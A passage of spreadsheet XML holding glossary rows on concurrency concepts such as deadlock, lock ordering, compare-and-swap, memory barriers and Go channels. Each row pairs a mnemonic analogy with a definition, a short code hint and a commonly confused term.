          <t>City-wide curfew vs per-street traffic lights.</t>
        </is>
      </c>
      <c r="J529" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K529" t="inlineStr">
        <is>
          <t>Locks &amp; mutual exclusion</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" t="n">
        <v>0</v>
      </c>
      <c r="B530" t="inlineStr">
        <is>
          <t>528</t>
        </is>
      </c>
      <c r="C530" t="inlineStr">
        <is>
          <t>Lock contention</t>
        </is>
      </c>
      <c r="D530" t="inlineStr">
        <is>
          <t>Six checkout lanes built, but everyone must pay at the single cigarette counter — full carts idle in one long snaking line.</t>
        </is>
      </c>
      <c r="E530" t="inlineStr">
        <is>
          <t>Many threads competing for the same lock turn parallel hardware into a serialized queue plus context-switch overhead.</t>
        </is>
      </c>
      <c r="F530" t="inlineStr">
        <is>
          <t>profile: 80% of time in futex_wait / fix: shard the lock or shrink the section</t>
        </is>
      </c>
      <c r="G530" t="inlineStr">
        <is>
          <t>Deadlock — contention is slow progress through a bottleneck; deadlock is zero progress forever.</t>
        </is>
      </c>
      <c r="H530" t="inlineStr">
        <is>
          <t>Rush-hour merge from six lanes to one toll booth.</t>
        </is>
      </c>
      <c r="J530" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K530" t="inlineStr">
        <is>
          <t>Locks &amp; mutual exclusion</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" t="n">
        <v>0</v>
      </c>
      <c r="B531" t="inlineStr">
        <is>
          <t>529</t>
        </is>
      </c>
      <c r="C531" t="inlineStr">
        <is>
          <t>Lock guard (RAII)</t>
        </is>
      </c>
      <c r="D531" t="inlineStr">
        <is>
          <t>A retractable dog leash bolted to your belt: however wildly the walk ends — trip, sprint, or faint — the leash reels itself back in.</t>
        </is>
      </c>
      <c r="E531" t="inlineStr">
        <is>
          <t>Acquire a lock through a scoped construct that guarantees release on every exit path, including exceptions.</t>
        </is>
      </c>
      <c r="F531" t="inlineStr">
        <is>
          <t>with lock: / risky() # released even if this raises</t>
        </is>
      </c>
      <c r="G531" t="inlineStr">
        <is>
          <t>Manual lock/unlock — one forgotten unlock on an exception path leaks the lock and hangs the whole app.</t>
        </is>
      </c>
      <c r="H531" t="inlineStr">
        <is>
          <t>Hotel door that always locks itself when it swings shut.</t>
        </is>
      </c>
      <c r="J531" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K531" t="inlineStr">
        <is>
          <t>Locks &amp; mutual exclusion</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" t="n">
        <v>0</v>
      </c>
      <c r="B532" t="inlineStr">
        <is>
          <t>530</t>
        </is>
      </c>
      <c r="C532" t="inlineStr">
        <is>
          <t>Deadlock</t>
        </is>
      </c>
      <c r="D532" t="inlineStr">
        <is>
          <t>Two overly polite movers wedged in a doorway, each gripping a box the other needs to set down first — statues at rush hour.</t>
        </is>
      </c>
      <c r="E532" t="inlineStr">
        <is>
          <t>Two or more threads each hold a resource another needs and wait in a cycle forever — none can ever proceed.</t>
        </is>
      </c>
      <c r="F532" t="inlineStr">
        <is>
          <t>T1: lock(A); lock(B) / T2: lock(B); lock(A) # both freeze</t>
        </is>
      </c>
      <c r="G532" t="inlineStr">
        <is>
          <t>Livelock — deadlocked threads sleep blocked and idle; livelocked threads burn CPU while achieving nothing.</t>
        </is>
      </c>
      <c r="H532" t="inlineStr">
        <is>
          <t>Gridlocked intersection where every car blocks the next.</t>
        </is>
      </c>
      <c r="J532" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K532" t="inlineStr">
        <is>
          <t>Deadlock, livelock &amp; starvation</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" t="n">
        <v>0</v>
      </c>
      <c r="B533" t="inlineStr">
        <is>
          <t>531</t>
        </is>
      </c>
      <c r="C533" t="inlineStr">
        <is>
          <t>Coffman conditions</t>
        </is>
      </c>
      <c r="D533" t="inlineStr">
        <is>
          <t>A four-legged card table sagging under coffee (Coffman) cups; kick away any single leg and the whole deadlock crashes to the floor.</t>
        </is>
      </c>
      <c r="E533" t="inlineStr">
        <is>
          <t>Deadlock requires all four: mutual exclusion, hold-and-wait, no preemption, circular wait — break any one and deadlock is impossible.</t>
        </is>
      </c>
      <c r="F533" t="inlineStr">
        <is>
          <t>prevention = negate one condition / e.g. lock ordering kills circular wait</t>
        </is>
      </c>
      <c r="G533" t="inlineStr">
        <is>
          <t>Deadlock detection — the four conditions say when deadlock CAN form; detection finds when it HAS formed.</t>
        </is>
      </c>
      <c r="H533" t="inlineStr">
        <is>
          <t>Four-number combination lock: miss one digit, it never closes.</t>
        </is>
      </c>
      <c r="J533" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K533" t="inlineStr">
        <is>
          <t>Deadlock, livelock &amp; starvation</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" t="n">
        <v>0</v>
      </c>
      <c r="B534" t="inlineStr">
        <is>
          <t>532</t>
        </is>
      </c>
      <c r="C534" t="inlineStr">
        <is>
          <t>Lock ordering</t>
        </is>
      </c>
      <c r="D534" t="inlineStr">
        <is>
          <t>Mountaineers who must clip carabiners strictly in the order 1, 2, 3 up the cliff face — no rope can ever loop back into a circle.</t>
        </is>
      </c>
      <c r="E534" t="inlineStr">
        <is>
          <t>Impose a global order on locks and always acquire in ascending order — circular wait becomes structurally impossible.</t>
        </is>
      </c>
      <c r="F534" t="inlineStr">
        <is>
          <t>lo, hi = sorted([a, b], key=id) / lock(lo); lock(hi)</t>
        </is>
      </c>
      <c r="G534" t="inlineStr">
        <is>
          <t>Try-lock with backoff — ordering prevents deadlock by construction; try-lock detects a clash and retreats after the fact.</t>
        </is>
      </c>
      <c r="H534" t="inlineStr">
        <is>
          <t>Always eating courses in menu order so no one swaps plates in a cycle.</t>
        </is>
      </c>
      <c r="J534" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K534" t="inlineStr">
        <is>
          <t>Deadlock, livelock &amp; starvation</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" t="n">
        <v>0</v>
      </c>
      <c r="B535" t="inlineStr">
        <is>
          <t>533</t>
        </is>
      </c>
      <c r="C535" t="inlineStr">
        <is>
          <t>Deadlock avoidance</t>
        </is>
      </c>
      <c r="D535" t="inlineStr">
        <is>
          <t>A cautious banker who approves your loan only after proving that even if EVERY customer maxes out at once, the vault still covers them all.</t>
        </is>
      </c>
      <c r="E535" t="inlineStr">
        <is>
          <t>Grant a resource request only if the resulting state stays safe — Banker's algorithm simulates worst-case maximum needs first.</t>
        </is>
      </c>
      <c r="F535" t="inlineStr">
        <is>
          <t>Banker's algorithm (Dijkstra) / request denied if state would be unsafe</t>
        </is>
      </c>
      <c r="G535" t="inlineStr">
        <is>
          <t>Prevention — prevention breaks a Coffman condition permanently by design; avoidance re-checks safety at every runtime request.</t>
        </is>
      </c>
      <c r="H535" t="inlineStr">
        <is>
          <t>Air traffic control refusing takeoff without a guaranteed landing slot.</t>
        </is>
      </c>
      <c r="J535" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K535" t="inlineStr">
        <is>
          <t>Deadlock, livelock &amp; starvation</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" t="n">
        <v>0</v>
      </c>
      <c r="B536" t="inlineStr">
        <is>
          <t>534</t>
        </is>
      </c>
      <c r="C536" t="inlineStr">
        <is>
          <t>Deadlock detection &amp; recovery</t>
        </is>
      </c>
      <c r="D536" t="inlineStr">
        <is>
          <t>A traffic helicopter spots the gridlock circle downtown and radios for one car to be towed (the victim) so the whole ring can flow again.</t>
        </is>
      </c>
      <c r="E536" t="inlineStr">
        <is>
          <t>Let deadlocks happen, find cycles in the wait-for graph, then recover by aborting a victim or preempting its resources.</t>
        </is>
      </c>
      <c r="F536" t="inlineStr">
        <is>
          <t>MySQL: Deadlock found; transaction rolled back / jstack prints the lock cycle</t>
        </is>
      </c>
      <c r="G536" t="inlineStr">
        <is>
          <t>Avoidance — avoidance refuses unsafe requests up front; detection cleans up after the cycle has already formed.</t>
        </is>
      </c>
      <c r="H536" t="inlineStr">
        <is>
          <t>Referee breaking up two wrestlers locked in a stalemate hold.</t>
        </is>
      </c>
      <c r="J536" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K536" t="inlineStr">
        <is>
          <t>Deadlock, livelock &amp; starvation</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" t="n">
        <v>0</v>
      </c>
      <c r="B537" t="inlineStr">
        <is>
          <t>535</t>
        </is>
      </c>
      <c r="C537" t="inlineStr">
        <is>
          <t>Livelock</t>
        </is>
      </c>
      <c r="D537" t="inlineStr">
        <is>
          <t>Two people in a corridor mirroring each other's polite sidesteps forever — dancing, sweating, and going absolutely nowhere.</t>
        </is>
      </c>
      <c r="E537" t="inlineStr">
        <is>
          <t>Threads stay active and keep reacting to each other yet make no progress — perpetual, perfectly synchronized mutual yielding.</t>
        </is>
      </c>
      <c r="F537" t="inlineStr">
        <is>
          <t>both release and retry on conflict, in sync / fix: randomized backoff</t>
        </is>
      </c>
      <c r="G537" t="inlineStr">
        <is>
          <t>Deadlock — livelocked threads run hot and busy; deadlocked threads sleep blocked. Both make zero progress.</t>
        </is>
      </c>
      <c r="H537" t="inlineStr">
        <is>
          <t>Two walkie-talkies saying 'go ahead' — 'no, you go ahead' forever.</t>
        </is>
      </c>
      <c r="J537" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K537" t="inlineStr">
        <is>
          <t>Deadlock, livelock &amp; starvation</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" t="n">
        <v>0</v>
      </c>
      <c r="B538" t="inlineStr">
        <is>
          <t>536</t>
        </is>
      </c>
      <c r="C538" t="inlineStr">
        <is>
          <t>Starvation</t>
        </is>
      </c>
      <c r="D538" t="inlineStr">
        <is>
          <t>The shortest kid at the buffet: the line never technically stops moving, but taller elbows sweep every fresh tray before he can reach one.</t>
        </is>
      </c>
      <c r="E538" t="inlineStr">
        <is>
          <t>A ready-to-run thread is perpetually denied CPU or resources because other threads always win the competition.</t>
        </is>
      </c>
      <c r="F538" t="inlineStr">
        <is>
          <t>readers keep arriving; the writer waits forever / low-priority thread never scheduled</t>
        </is>
      </c>
      <c r="G538" t="inlineStr">
        <is>
          <t>Deadlock — a starved thread could run if ever chosen; a deadlocked thread cannot run under any schedule.</t>
        </is>
      </c>
      <c r="H538" t="inlineStr">
        <is>
          <t>Taxi stand where the last cab in line never gets a fare.</t>
        </is>
      </c>
      <c r="J538" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K538" t="inlineStr">
        <is>
          <t>Deadlock, livelock &amp; starvation</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" t="n">
        <v>0</v>
      </c>
      <c r="B539" t="inlineStr">
        <is>
          <t>537</t>
        </is>
      </c>
      <c r="C539" t="inlineStr">
        <is>
          <t>Fairness</t>
        </is>
      </c>
      <c r="D539" t="inlineStr">
        <is>
          <t>A bakery ticket dispenser: pull number 47 and even the pushiest customer physically cannot be served before you.</t>
        </is>
      </c>
      <c r="E539" t="inlineStr">
        <is>
          <t>A fairness policy such as FIFO lock queues guarantees waiters acquire in arrival order, trading raw throughput for no starvation.</t>
        </is>
      </c>
      <c r="F539" t="inlineStr">
        <is>
          <t>new ReentrantLock(true) // Java fair mode / ticket spinlocks in OS kernels</t>
        </is>
      </c>
      <c r="G539" t="inlineStr">
        <is>
          <t>Priority scheduling — fair queues serve arrival order; priorities deliberately serve some threads first, which is what risks starvation.</t>
        </is>
      </c>
      <c r="H539" t="inlineStr">
        <is>
          <t>Playground rule: everyone gets one turn before anyone gets two.</t>
        </is>
      </c>
      <c r="J539" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K539" t="inlineStr">
        <is>
          <t>Deadlock, livelock &amp; starvation</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" t="n">
        <v>0</v>
      </c>
      <c r="B540" t="inlineStr">
        <is>
          <t>538</t>
        </is>
      </c>
      <c r="C540" t="inlineStr">
        <is>
          <t>Priority inversion</t>
        </is>
      </c>
      <c r="D540" t="inlineStr">
        <is>
          <t>A janitor holding the only server-room key is kept mopping by middle managers while the CEO waits outside — until the CEO lends the janitor his badge (inheritance).</t>
        </is>
      </c>
      <c r="E540" t="inlineStr">
        <is>
          <t>A low-priority thread holding a lock blocks a high-priority one while medium threads preempt the holder; priority inheritance fixes it.</t>
        </is>
      </c>
      <c r="F540" t="inlineStr">
        <is>
          <t>Mars Pathfinder 1997 watchdog reboots / fix: priority inheritance in VxWorks</t>
        </is>
      </c>
      <c r="G540" t="inlineStr">
        <is>
          <t>Starvation — inversion is blocking through a lock held by a preempted low-priority thread; the cure is inheritance, not fair queuing.</t>
        </is>
      </c>
      <c r="H540" t="inlineStr">
        <is>
          <t>Ambulance stuck behind a bicycle that traffic keeps cutting off.</t>
        </is>
      </c>
      <c r="J540" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K540" t="inlineStr">
        <is>
          <t>Deadlock, livelock &amp; starvation</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" t="n">
        <v>0</v>
      </c>
      <c r="B541" t="inlineStr">
        <is>
          <t>539</t>
        </is>
      </c>
      <c r="C541" t="inlineStr">
        <is>
          <t>Dining philosophers</t>
        </is>
      </c>
      <c r="D541" t="inlineStr">
        <is>
          <t>The domain image itself: five bearded thinkers frozen mid-reach over spaghetti, each clutching a left fork, eternally waiting on the right.</t>
        </is>
      </c>
      <c r="E541" t="inlineStr">
        <is>
          <t>Five philosophers share five forks, each needing two to eat — the canonical model of deadlock, starvation, and their remedies.</t>
        </is>
      </c>
      <c r="F541" t="inlineStr">
        <is>
          <t>fix 1: number forks, grab lower first / fix 2: waiter admits at most 4 sitters</t>
        </is>
      </c>
      <c r="G541" t="inlineStr">
        <is>
          <t>Producer-consumer problem — philosophers model cyclic resource deadlock; producer-consumer models buffer synchronization.</t>
        </is>
      </c>
      <c r="H541" t="inlineStr">
        <is>
          <t>Five guitarists sharing five picks, needing two picks each.</t>
        </is>
      </c>
      <c r="J541" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K541" t="inlineStr">
        <is>
          <t>Deadlock, livelock &amp; starvation</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" t="n">
        <v>0</v>
      </c>
      <c r="B542" t="inlineStr">
        <is>
          <t>540</t>
        </is>
      </c>
      <c r="C542" t="inlineStr">
        <is>
          <t>Atomic operation</t>
        </is>
      </c>
      <c r="D542" t="inlineStr">
        <is>
          <t>A magician's tablecloth yank: the dishes are either fully set or fully whisked away — no plate is ever seen in mid-air.</t>
        </is>
      </c>
      <c r="E542" t="inlineStr">
        <is>
          <t>An operation that completes indivisibly: no other thread can observe or interleave with a halfway state.</t>
        </is>
      </c>
      <c r="F542" t="inlineStr">
        <is>
          <t>AtomicInteger n; n.incrementAndGet(); / Go: atomic.AddInt64(&amp;c, 1)</t>
        </is>
      </c>
      <c r="G542" t="inlineStr">
        <is>
          <t>volatile — volatile gives visibility of single reads/writes; atomic RMW ops make whole read-modify-write cycles indivisible.</t>
        </is>
      </c>
      <c r="H542" t="inlineStr">
        <is>
          <t>A camera flash: the scene is captured in one instant, never smeared.</t>
        </is>
      </c>
      <c r="J542" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K542" t="inlineStr">
        <is>
          <t>Atomics &amp; memory ordering</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" t="n">
        <v>0</v>
      </c>
      <c r="B543" t="inlineStr">
        <is>
          <t>541</t>
        </is>
      </c>
      <c r="C543" t="inlineStr">
        <is>
          <t>Compare-and-swap (CAS)</t>
        </is>
      </c>
      <c r="D543" t="inlineStr">
        <is>
          <t>A vending machine that swaps in your new bottle only if the slot still shows exactly the barcode you claimed was there — else it spits your coin back.</t>
        </is>
      </c>
      <c r="E543" t="inlineStr">
        <is>
          <t>A CPU instruction that atomically writes a new value only if the location still holds the expected old value, reporting success or failure.</t>
        </is>
      </c>
      <c r="F543" t="inlineStr">
        <is>
          <t>ok = x.compare_exchange(old, new) / CMPXCHG on x86</t>
        </is>
      </c>
      <c r="G543" t="inlineStr">
        <is>
          <t>Test-and-set — TAS blindly sets a flag and returns the old bit; CAS conditions its write on a full expected value.</t>
        </is>
      </c>
      <c r="H543" t="inlineStr">
        <is>
          <t>Escrow deal that executes only if the deed is unchanged.</t>
        </is>
      </c>
      <c r="J543" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K543" t="inlineStr">
        <is>
          <t>Atomics &amp; memory ordering</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" t="n">
        <v>0</v>
      </c>
      <c r="B544" t="inlineStr">
        <is>
          <t>542</t>
        </is>
      </c>
      <c r="C544" t="inlineStr">
        <is>
          <t>CAS retry loop</t>
        </is>
      </c>
      <c r="D544" t="inlineStr">
        <is>
          <t>Editing a wiki page that rejects your save because someone edited meanwhile — you reload, redo the edit on the fresh text, and hit save again.</t>
        </is>
      </c>
      <c r="E544" t="inlineStr">
        <is>
          <t>Optimistic update pattern: read the value, compute the new one, CAS it in; if another thread won, reread and retry.</t>
        </is>
      </c>
      <c r="F544" t="inlineStr">
        <is>
          <t>do { old = x.get(); } / while (!x.compareAndSet(old, f(old)));</t>
        </is>
      </c>
      <c r="G544" t="inlineStr">
        <is>
          <t>Spinlock — a spinlock spins waiting to enter a section; a CAS loop attempts real work each spin, lock-free.</t>
        </is>
      </c>
      <c r="H544" t="inlineStr">
        <is>
          <t>Bidding again each time you're outbid in the last second.</t>
        </is>
      </c>
      <c r="J544" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K544" t="inlineStr">
        <is>
          <t>Atomics &amp; memory ordering</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" t="n">
        <v>0</v>
      </c>
      <c r="B545" t="inlineStr">
        <is>
          <t>543</t>
        </is>
      </c>
      <c r="C545" t="inlineStr">
        <is>
          <t>Visibility &amp; volatile</t>
        </is>
      </c>
      <c r="D545" t="inlineStr">
        <is>
          <t>Shouting updates at a colleague wearing noise-canceling headphones — marking the field volatile rips the headphones off so every announcement lands.</t>
        </is>
      </c>
      <c r="E545" t="inlineStr">
        <is>
          <t>Unsynchronized threads may see stale cached values forever; volatile/atomic marks force writes to become visible to other threads.</t>
        </is>
      </c>
      <c r="F545" t="inlineStr">
        <is>
          <t>volatile boolean stop; // Java / while (!stop) {} // now sees the flip</t>
        </is>
      </c>
      <c r="G545" t="inlineStr">
        <is>
          <t>Atomicity — volatile publishes individual reads and writes; it does not make compound ops like count++ atomic.</t>
        </is>
      </c>
      <c r="H545" t="inlineStr">
        <is>
          <t>Corkboard memo vs a megaphone blast everyone must hear.</t>
        </is>
      </c>
      <c r="J545" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K545" t="inlineStr">
        <is>
          <t>Atomics &amp; memory ordering</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" t="n">
        <v>0</v>
      </c>
      <c r="B546" t="inlineStr">
        <is>
          <t>544</t>
        </is>
      </c>
      <c r="C546" t="inlineStr">
        <is>
          <t>Instruction reordering</t>
        </is>
      </c>
      <c r="D546" t="inlineStr">
        <is>
          <t>A barista makes your two drinks in whatever order is fastest; the customer behind you sees the latte appear before your 'first' espresso.</t>
        </is>
      </c>
      <c r="E546" t="inlineStr">
        <is>
          <t>Compilers and CPUs reorder independent memory operations for speed; other threads may observe effects out of program order.</t>
        </is>
      </c>
      <c r="F546" t="inlineStr">
        <is>
          <t>T1: data = 42; ready = true / T2 may observe ready=true, data=0</t>
        </is>
      </c>
      <c r="G546" t="inlineStr">
        <is>
          <t>Torn read — reordering shuffles whole operations in time; tearing splits one value into inconsistent halves.</t>
        </is>
      </c>
      <c r="H546" t="inlineStr">
        <is>
          <t>Mail arriving in a different order than it was sent.</t>
        </is>
      </c>
      <c r="J546" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K546" t="inlineStr">
        <is>
          <t>Atomics &amp; memory ordering</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" t="n">
        <v>0</v>
      </c>
      <c r="B547" t="inlineStr">
        <is>
          <t>545</t>
        </is>
      </c>
      <c r="C547" t="inlineStr">
        <is>
          <t>Memory barrier</t>
        </is>
      </c>
      <c r="D547" t="inlineStr">
        <is>
          <t>A border checkpoint across a highway of trucks: no truck may overtake another through the gate — the convoy's order is frozen at the line.</t>
        </is>
      </c>
      <c r="E547" t="inlineStr">
        <is>
          <t>A fence instruction forbidding compiler and CPU from moving memory operations across it, restoring cross-thread ordering.</t>
        </is>
      </c>
      <c r="F547" t="inlineStr">
        <is>
          <t>std::atomic_thread_fence(seq_cst); / mfence on x86</t>
        </is>
      </c>
      <c r="G547" t="inlineStr">
        <is>
          <t>Mutex — a lock gives exclusion plus implicit fences; a bare fence orders memory without blocking anyone.</t>
        </is>
      </c>
      <c r="H547" t="inlineStr">
        <is>
          <t>A canal lock forcing boats through strictly in sequence.</t>
        </is>
      </c>
      <c r="J547" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K547" t="inlineStr">
        <is>
          <t>Atomics &amp; memory ordering</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" t="n">
        <v>0</v>
      </c>
      <c r="B548" t="inlineStr">
        <is>
          <t>546</t>
        </is>
      </c>
      <c r="C548" t="inlineStr">
        <is>
          <t>Acquire/release ordering</t>
        </is>
      </c>
      <c r="D548" t="inlineStr">
        <is>
          <t>A gym locker handoff: you pack the locker, then release the key onto the hook; whoever acquires the key is guaranteed everything packed before it.</t>
        </is>
      </c>
      <c r="E548" t="inlineStr">
        <is>
          <t>A release store publishes all writes before it; an acquire load that sees it imports them — a one-way visibility handshake between two threads.</t>
        </is>
      </c>
      <c r="F548" t="inlineStr">
        <is>
          <t>flag.store(1, memory_order_release); / if (flag.load(acquire)) use(data);</t>
        </is>
      </c>
      <c r="G548" t="inlineStr">
        <is>
          <t>Sequential consistency — seq_cst imposes one global order over all atomics; acquire/release only pairs a writer with its readers.</t>
        </is>
      </c>
      <c r="H548" t="inlineStr">
        <is>
          <t>Sealed courier pouch: contents locked in at release, opened on acquire.</t>
        </is>
      </c>
      <c r="J548" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K548" t="inlineStr">
        <is>
          <t>Atomics &amp; memory ordering</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" t="n">
        <v>0</v>
      </c>
      <c r="B549" t="inlineStr">
        <is>
          <t>547</t>
        </is>
      </c>
      <c r="C549" t="inlineStr">
        <is>
          <t>ABA problem</t>
        </is>
      </c>
      <c r="D549" t="inlineStr">
        <is>
          <t>You memorize your parking row by the red car beside yours; it leaves and an identical red car parks there — same view, wrong world, lost car.</t>
        </is>
      </c>
      <c r="E549" t="inlineStr">
        <is>
          <t>CAS sees the expected value A, but it changed A to B and back to A meanwhile — pointer reuse makes 'unchanged' a lie.</t>
        </is>
      </c>
      <c r="F549" t="inlineStr">
        <is>
          <t>lock-free pop: head A freed, realloc'd as A / fix: tagged pointer (ptr, version)</t>
        </is>
      </c>
      <c r="G549" t="inlineStr">
        <is>
          <t>Stale read — a stale value is genuinely old; ABA is a current value indistinguishable from the old one, so you add version counters.</t>
        </is>
      </c>
      <c r="H549" t="inlineStr">
        <is>
          <t>Guard sees the same painting after thieves swapped in a forgery of the original.</t>
        </is>
      </c>
      <c r="J549" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K549" t="inlineStr">
        <is>
          <t>Atomics &amp; memory ordering</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" t="n">
        <v>0</v>
      </c>
      <c r="B550" t="inlineStr">
        <is>
          <t>548</t>
        </is>
      </c>
      <c r="C550" t="inlineStr">
        <is>
          <t>Lock-free vs wait-free</t>
        </is>
      </c>
      <c r="D550" t="inlineStr">
        <is>
          <t>Lock-free is a mosh-pit exit where somebody always squeezes through; wait-free is numbered turnstiles guaranteeing each person exits in k clicks.</t>
        </is>
      </c>
      <c r="E550" t="inlineStr">
        <is>
          <t>Lock-free: some thread always makes progress system-wide; wait-free: every thread completes in bounded steps — the stronger guarantee.</t>
        </is>
      </c>
      <c r="F550" t="inlineStr">
        <is>
          <t>CAS retry loop: lock-free (losers retry) / atomic fetch_add counter: wait-free</t>
        </is>
      </c>
      <c r="G550" t="inlineStr">
        <is>
          <t>Non-blocking means fast — lock-free code can be slower than locks; the guarantee is about progress, not speed.</t>
        </is>
      </c>
      <c r="H550" t="inlineStr">
        <is>
          <t>Raffle where someone always wins vs stipend where everyone is paid.</t>
        </is>
      </c>
      <c r="J550" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K550" t="inlineStr">
        <is>
          <t>Atomics &amp; memory ordering</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" t="n">
        <v>0</v>
      </c>
      <c r="B551" t="inlineStr">
        <is>
          <t>549</t>
        </is>
      </c>
      <c r="C551" t="inlineStr">
        <is>
          <t>False sharing</t>
        </is>
      </c>
      <c r="D551" t="inlineStr">
        <is>
          <t>Twins in one bunk bed: every time one rolls over (writes), the whole frame shakes the other awake — separate beds (padding) fix everything.</t>
        </is>
      </c>
      <c r="E551" t="inlineStr">
        <is>
          <t>Independent variables on the same 64-byte cache line force cores to invalidate each other's caches on every write, wrecking scaling.</t>
        </is>
      </c>
      <c r="F551" t="inlineStr">
        <is>
          <t>struct { a int64; _pad [56]byte; b int64 } / Java: @Contended</t>
        </is>
      </c>
      <c r="G551" t="inlineStr">
        <is>
          <t>True sharing — true sharing contends on the same variable; false sharing contends only on the same cache line by accident of layout.</t>
        </is>
      </c>
      <c r="H551" t="inlineStr">
        <is>
          <t>Two clerks with separate ledgers forced to share one slam-prone drawer.</t>
        </is>
      </c>
      <c r="J551" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K551" t="inlineStr">
        <is>
          <t>Atomics &amp; memory ordering</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" t="n">
        <v>0</v>
      </c>
      <c r="B552" t="inlineStr">
        <is>
          <t>550</t>
        </is>
      </c>
      <c r="C552" t="inlineStr">
        <is>
          <t>Share memory by communicating</t>
        </is>
      </c>
      <c r="D552" t="inlineStr">
        <is>
          <t>Instead of both cooks stirring one pot with rules about turns, they slide the whole pot through a serving hatch — only the current holder may stir.</t>
        </is>
      </c>
      <c r="E552" t="inlineStr">
        <is>
          <t>Go proverb: don't guard shared memory with locks — transfer data ownership through channels so only one side touches it at a time.</t>
        </is>
      </c>
      <c r="F552" t="inlineStr">
        <is>
          <t>ch &lt;- job // ownership travels with the value / receiver now mutates it alone</t>
        </is>
      </c>
      <c r="G552" t="inlineStr">
        <is>
          <t>Shared memory + locks — locks let many threads touch one thing safely; message passing arranges for one toucher at a time.</t>
        </is>
      </c>
      <c r="H552" t="inlineStr">
        <is>
          <t>Passing the salt instead of everyone lunging across the table.</t>
        </is>
      </c>
      <c r="J552" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K552" t="inlineStr">
        <is>
          <t>Message passing &amp; actors</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" t="n">
        <v>0</v>
      </c>
      <c r="B553" t="inlineStr">
        <is>
          <t>551</t>
        </is>
      </c>
      <c r="C553" t="inlineStr">
        <is>
          <t>Channel</t>
        </is>
      </c>
      <c r="D553" t="inlineStr">
        <is>
          <t>A pneumatic bank tube between tellers: capsules whoosh across the ceiling, and the tube itself paces who waits for whom.</t>
        </is>
      </c>
      <c r="E553" t="inlineStr">
        <is>
          <t>A typed conduit through which concurrent tasks send and receive values, synchronizing as the data flows.</t>
        </is>
      </c>
      <c r="F553" t="inlineStr">
        <is>
          <t>ch := make(chan int) / ch &lt;- 42 // send / v := &lt;-ch // receive</t>
        </is>
      </c>
      <c r="G553" t="inlineStr">
        <is>
          <t>Plain queue — a queue merely stores; a channel also synchronizes (blocking ends) and supports close and select.</t>
        </is>
      </c>
      <c r="H553" t="inlineStr">
        <is>
          <t>Two tin cans joined by taut string.</t>
        </is>
      </c>
      <c r="J553" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K553" t="inlineStr">
        <is>
          <t>Message passing &amp; actors</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" t="n">
        <v>0</v>
      </c>
      <c r="B554" t="inlineStr">
        <is>
          <t>552</t>
        </is>
      </c>
      <c r="C554" t="inlineStr">
        <is>
          <t>Unbuffered channel</t>
        </is>
      </c>
      <c r="D554" t="inlineStr">
        <is>
          <t>A trapeze handoff: the flyer hangs suspended mid-air (blocked) until the catcher's hands arrive at the exact same moment.</t>
        </is>
